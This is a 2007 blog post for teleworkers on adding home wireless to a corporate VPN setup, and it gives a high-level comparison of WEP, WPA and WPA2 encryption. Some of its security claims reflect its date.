Monday, March 5, 2007

Teleworker- Wireless

Nowadays, people expect wireless connections wherever they go- hotel rooms, airports, coffee shops, and even parks. Of course, many corporations are starting to incorporate wireless into their network designs- not only in conference rooms, but pervasively, throughout the entire building or campus. Of course, enterprise wireless is much different than the wireless router that one might have in his or her home, but nonetheless they both operate under some of the same principles. Users want to experience the comforts of surfing the web or doing work from the couch, the bedroom, or even their backyard. Leo has explained how to teleworker allows a user to connect into his corporate headquarters securely from his or her house through the use of VPN and NAC and also how to extend their capabilities by adding an IP phone to the mix, but wireless will allow a user to connect to the office from anywhere in his house. However, given the fact that this data is transmitted without the security of wires, we must be aware of the security holes that exist in the technology and how this can compromise the secure connections we have made into the corporate network. Leo has explained VPN both IPsec and SSL as well as the VPN software client and the possibility of using a hardware VPN box to off-load the processing from your machine.

Let us start with the easy scenario where you have a connection from your home machine to your router. If you start the software VPN client, you might notice that you can no longer connect to your home router to make any administrative changes or access any information you have on your local network. This is because with the VPN connection, as Leo has mentioned earlier, you are directly connected into your corporate network, thus bypassing your local network resources. There is no reason to worry about the wireless connection in this case- the traffic is all flowing through your secure VPN tunnel.

With a VPN Applicance- here, things get a little tricky. Let us assume that you have decided to get a VPN hardware solution and have a permanent connection to your corporate network. However, you don't want to have to make a direct connection to the ethernet switchports on the back to connect to it. How can we add wireless to this connection? Some appliances, like the Cisco 850 wireless ISR router, come with wireless built-in, but even then, secure connections need to be made. If like me, you use an appliance that does not have integrated wireless, you can add a wireless access point to one of the ports and then associate to that. A word of caution- either route, with integrated wireless or not, your system is only as secure as the weakest link. Inherently, without any security policies in place, your wireless network will be wide open and anyone can connect to it. Therefore, if someone were to connect to your access point and it was connected to your hardware device, they could have access to your corporate network as well.

So what can we do to mitigate this? There are two areas that are important- encryption and authentication. We will cover authentication in detail when we discuss enterprise wireless, but for home use encryption is much more important. Encryption is much like what the VPN tunnel does, it mashes up the data so that if someone is able to "grab it," they will not be able to understand it. There are levels of encryption- WEP, WPA and WPA2. Let's take a high-level view at each one of these

WEP- is the oldest of the encryption methods and does have rudmentary authenticaiton built-in to it. Recently, it has been considered to be no longer viable for enterprise use, as it is very easy to crack. The reason it is so easy is because part of the passkey needed to start the process is passed in the open without any encrpytion.

WPA and WPA2- are essentially the same, one uses an algorithm called TKIP and WPA2 uses a much stroger one called AES. To date, no one has successfully cracked AES and to crack TKIP takes so much time that it is considered to be very strong as well. When possible use WPA2, though this ability is only available on machines after 2004 because of the driver requirements WPA (which uses TKIP) is available on all machines that are running Windows XP.

To implement WPA you want to choose a passphrase that you will input in the menu of the access point as well as your computer. This passphrase is encrypted and the access point compares the passphrase with it has stored. If they match- the process is complete. The reason WPA is so much more secure is that it uses many different methods for disguising both the passphrase and the data, so that it is impossible for a hacker to capture and utilize that traffic.

There are many more security measures that can help enhance the protection of your wireless network, as well as more robust features for business. However, by simply incorporating WPA or WPA2 into your access point, you will create a secure tunnel that will allow you to connect securely to your corporate network from anywhere in your home.

No comments: